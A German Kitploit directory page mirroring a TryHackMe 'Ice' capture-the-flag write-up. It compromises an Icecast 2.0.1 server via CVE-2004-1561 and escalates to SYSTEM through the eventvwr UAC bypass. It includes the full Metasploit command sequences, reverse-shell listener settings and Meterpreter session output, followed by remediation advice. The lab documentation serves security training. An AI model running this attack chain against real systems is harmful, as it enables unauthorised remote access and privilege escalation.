Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
thm-ice-icecast-rce-privesc — Vollständige Kompromittierung der Ice-Maschine von TryHackMe — Icecast 2.0.1 RCE (CVE-2004-1561) über Buffer Overflow, gefolgt von Windows-Privilege-Escalation durch UAC-Bypass / COM-Hijacking. Enthält detaillierte Methodik und Behebung. | Kitploit
Tools/GitHubGitHub/monseigneurpatas/thm-ice-icecast-rce-privesc
Privilege EscalationAufklärungSchwachstellenanalyseExploitationCTFPenetrationstestsLernen & BildungBinary-Exploitation

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
monseigneurpatas/thm-ice-icecast-rce-privesc

thm-ice-icecast-rce-privesc

Vollständige Kompromittierung der Ice-Maschine von TryHackMe — Icecast 2.0.1 RCE (CVE-2004-1561) über Buffer Overflow, gefolgt von Windows-Privilege-Escalation durch UAC-Bypass / COM-Hijacking. Enthält detaillierte Methodik und Behebung.

Repository anzeigen
2vor 2 MonatenNoch nicht geprüft

TryHackMe — Ice: Icecast 2.0.1 RCE & Windows-Privilegieneskalation

Plattform: TryHackMe Ziel-Betriebssystem: Windows 7 / Windows Server 2008 R2 Schwierigkeit: Einfach Kategorie: Buffer Overflow (RCE), lokale Privilegieneskalation


Zusammenfassung

Dieser Bericht dokumentiert die vollständige Kompromittierung der Ice-Maschine auf TryHackMe, von der ersten Aufklärung bis zur Privilegieneskalation auf SYSTEM-Ebene. Das Zielsystem betreibt einen veralteten Icecast-2.0.1-Streaming-Media-Server, der anfällig für einen Remote-Buffer-Overflow (CVE-2004-1561) ist, der die Ausführung beliebigen Codes über manipulierte HTTP-Header ermöglicht. Der Erstzugriff wurde als Benutzer mit niedrigen Rechten über eine Meterpreter-Reverse-Shell erlangt. Die Privilegieneskalation zu NT AUTHORITY\SYSTEM wurde anschließend durch Ausnutzung einer Windows-COM-Object-Hijack-Schwachstelle (bypassuac_eventvwr) erreicht, die automatisch höherstufende Binärdateien und Registry-Schlüssel-Umleitung unter HKCU ausnutzt.

PhaseTechnikErgebnis
Aufklärungarp-scan, nmapHost identifiziert + 7 offene Ports
ErstzugriffIcecast-HTTP-Header-Buffer-Overflow (CVE-2004-1561)Meterpreter-Sitzung als lokaler Benutzer
Privilegieneskalationbypassuac_eventvwr (COM-/Registry-Hijacking)SYSTEM-Shell

1. Aufklärung

1.1 Host-Erkennung

Zur Identifizierung der IP-Adresse des Zielsystems im lokalen Netzwerk wurde ein ARP-Scan verwendet.

root@kitploit:~
arp-scan -l

ARP-Scan- und Nmap-Ergebnisse

Zielsystem unter 192.168.37.138 identifiziert.

1.2 Port- und Dienst-Enumeration

Gegen das Zielsystem wurde ein vollständiger SYN-Scan mit Service-/Versionserkennung ausgeführt:

root@kitploit:~
nmap -sS -sV 192.168.37.138

Ergebnisse:

Das Host-Fingerprinting ergab DARK-PC, einen Windows-Rechner. Port 8000 mit Icecast stach als vielversprechendste Angriffsfläche hervor — es handelt sich nicht um einen standardmäßigen Windows-Dienst, und er ist für historische CVEs bekannt.


2. Identifizierung der Schwachstelle

Eine Suche nach bekannten Icecast-Schwachstellen ergab CVE-2004-1561:

Ein Buffer Overflow in Icecast 2.0.1 und früheren Versionen ermöglicht es entfernten Angreifern, beliebigen Code über eine HTTP-Anfrage mit einer großen Anzahl von Headern auszuführen.

Ein passendes Metasploit-Modul wurde bestätigt:

root@kitploit:~
search CVE-2004-1561

CVE-Suche in Metasploit

root@kitploit:~
exploit/windows/http/icecast_header   2004-09-28   great   No   Icecast Header Overwrite

3. Ausnutzung — Erstzugriff

3.1 Grundursache

Icecast 2.0.1 führt keine ordnungsgemäße Grenzprüfung der Anzahl der verarbeiteten HTTP-Header durch. Sendet man mehr Header, als der Puffer des Servers verarbeiten kann, läuft die überschüssige Datenmenge in den angrenzenden Speicher über und überschreibt Daten außerhalb des reservierten Header-Parsing-Puffers.

Konkret korrumpiert der Overflow die gespeicherte Rücksprungadresse (EIP) auf dem Stack — die Adresse, zu der die CPU zurückspringt, sobald die Funktion, die die Anfrage verarbeitet, zurückkehrt. Durch die Kontrolle dieser Adresse kann ein Angreifer die Ausführung auf selbst bereitgestellten Shellcode umleiten, anstatt zum legitimen Rücksprungpunkt zurückzukehren, was zur Ausführung beliebigen Codes im Kontext des Icecast-Prozesses führt.

3.2 Modulkonfiguration

root@kitploit:~
use exploit/windows/http/icecast_header
set RHOSTS 192.168.37.138
set RPORT 8000
set LHOST 192.168.37.133
set LPORT 4444

Exploit-Optionen und erfolgreicher Lauf

3.3 Ausführung

root@kitploit:~
exploit
root@kitploit:~
[*] Started reverse TCP handler on 192.168.37.133:4444
[*] Sending stage (177734 bytes) to 192.168.37.138
[*] Meterpreter session 1 opened (192.168.37.133:4444 -> 192.168.37.138:49181)

Es wurde eine Meterpreter-Sitzung als Benutzer mit niedrigen Rechten aufgebaut.


4. Privilegieneskalation

4.1 Local Exploit Suggester

Mit einer aktiven Sitzung wurde der in Metasploit integrierte Suggester verwendet, um gangbare Wege zur lokalen Privilegieneskalation für den Patch-Stand des Zielsystems zu identifizieren:

root@kitploit:~
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Ergebnisse des Local Exploit Suggester

Mehrere Module wurden als wahrscheinlich gangbar markiert, darunter bypassuac_eventvwr, das nicht gepatchte Windows-7-/Server-2008-R2-Hosts angreift.

4.2 Grundursache — UAC-Bypass per COM-Hijacking

Dieser Privilegieneskalationspfad missbraucht die COM-Architektur (Component Object Model) von Windows, die es in verschiedenen Sprachen geschriebenen Komponenten ermöglicht, zusammenzuarbeiten. COM-Objekte verlassen sich üblicherweise auf gemeinsam genutzte DLLs, und das System ermittelt über Registry-Pfade, welche DLL für ein bestimmtes COM-Objekt geladen wird — einschließlich Pfaden, die im HKCU-Hive des aktuellen Benutzers gespeichert sind.

eventvwr.exe ist eine automatisch höherstufende Windows-Binärdatei (bei Standard-UAC-Konfigurationen löst sie aufgrund ihrer Manifest-Einstellungen stillschweigend eine UAC-Erhöhung aus, ohne den Dialog selbst anzuzeigen). Wenn sie ausgeführt wird, fragt sie HKCU ab, um ein COM-Objekt aufzulösen und die zugehörige DLL zu laden.

Der Exploit übernimmt diese Auflösung: Er schreibt einen bösartigen Registry-Schlüssel in den HKCU-Hive des aktuellen Benutzers und lenkt die COM-Auflösung auf ein vom Angreifer kontrolliertes Payload um, anstatt auf die legitime System-DLL. Da eventvwr.exe automatisch erhöht, wird das von ihm ausgelöste Payload — in diesem Fall eine Kommando-Shell — mit der Integritätsstufe ausgeführt, auf die eventvwr.exe erhöht, wodurch die Sitzung von einem Standardbenutzer zu einem Kontext mit höheren Rechten eskaliert wird, ohne dass jemals ein sichtbarer UAC-Dialog erscheint.

4.3 Ausführung

root@kitploit:~
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set LHOST 192.168.37.133
set LPORT 4444
exploit

Erfolgreicher Privilegieneskalations-Exploit

root@kitploit:~
[*] UAC is enabled, checking level...
[+] Part of Administrators group! Continuing...
[*] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[*] Meterpreter session 2 opened (192.168.37.133:4444 -> 192.168.37.138:49180)
[*] Cleaning up registry keys ...

C:\Windows\system32>

Es wurde eine zweite Meterpreter-Sitzung mit einer erhöhten Shell geöffnet, die direkt in C:\Windows\system32 startete und damit die Privilegieneskalation bestätigte.


5. Zusammenfassung der Ergebnisse

#ErgebnisSchweregradCVE / Referenz

6. Behebung

  1. Icecast patchen oder ersetzen. Version 2.0.1 ist seit über zwei Jahrzehnten veraltet; aktualisieren Sie auf die neueste gepflegte Version oder stellen Sie den Dienst außer Betrieb, wenn er nicht genutzt wird.
  2. Beschränken Sie die Erreichbarkeit von Streaming-/Mediendiensten ausschließlich auf interne Netzwerke — sie sollten ohne klaren geschäftlichen Bedarf nicht aus dem Internet oder im gesamten LAN erreichbar sein.
  3. Aktuelle Windows-Updates einspielen. Der Missbrauch der Auto-Elevation von eventvwr.exe wurde in späteren Windows-Builds behoben; dieser Angriff funktioniert gegen vollständig aktualisierte, moderne Windows-Versionen nicht.
  4. Härten Sie die UAC-Einstellungen, indem Sie "Immer benachrichtigen" anstelle der Standardstufe wählen, wodurch mehrere Missbrauchspfade der stillen Auto-Elevation geschlossen werden.
  5. Prinzip der geringsten Privilegien: Das kompromittierte Konto hätte nicht Teil der lokalen Administratoren-Gruppe sein dürfen, was es der UAC-Bypass-Technik überhaupt erst ermöglichte, erfolgreich zu sein.

Verwendete Werkzeuge

  • arp-scan, nmap — Aufklärung
  • Metasploit Framework (msfconsole) — Exploitation und Post-Exploitation
  • Meterpreter — Post-Exploitation-Shell

Demonstrierte Fähigkeiten

  • Netzwerk-Aufklärung und Dienst-Enumeration
  • CVE-Recherche und Zuordnung von Exploit zu Schwachstelle
  • Konzepte zur Ausnutzung von Speicherkorruption / Buffer Overflows (EIP-Überschreibung)
  • Windows-Interna: COM-Objektauflösung, Registry-Hijacking, UAC-Bypass-Mechanik
  • Dokumentation der vollständigen Angriffskette (Aufklärung → Exploitation → Privesc → Behebung)
Tool herunterladen
PortServiceVersion
135/tcpmsrpcMicrosoft Windows RPC
139/tcpnetbios-ssnMicrosoft Windows netbios-ssn
445/tcpmicrosoft-dsWindows 7–10 (workgroup: WORKGROUP)
5357/tcphttpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcphttpIcecast-Streaming-Media-Server
49152–49157/tcpmsrpcMicrosoft Windows RPC
1Icecast-2.0.1-HTTP-Header-Buffer-Overflow, der zur Remote-Code-Ausführung führtKritischCVE-2004-1561
2UAC-Bypass per COM-/Registry-Hijacking (eventvwr.exe-Auto-Elevation)HochBekannte UAC-Designschwäche von Windows 7/Server 2008 R2